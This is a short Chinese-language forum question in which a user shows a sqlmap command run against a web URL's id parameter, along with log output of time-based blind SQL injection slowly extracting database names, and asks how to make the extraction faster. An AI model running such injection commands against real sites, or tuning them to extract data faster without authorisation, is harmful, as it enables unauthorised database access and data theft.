这是一个例子。只是试图列出数据库:
python sqlmap.py -u "http://somesite.com/?id=1" --dbs
[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_
您可以在时间戳中看到列出 1 个数据库名称大约需要 3 分钟,它一个字符一个字符地进行,每个字符大约需要 7 秒。我在 youtube 上看到的教程非常快……我能做些什么来加快速度?我试过弄乱 .conf
谢谢。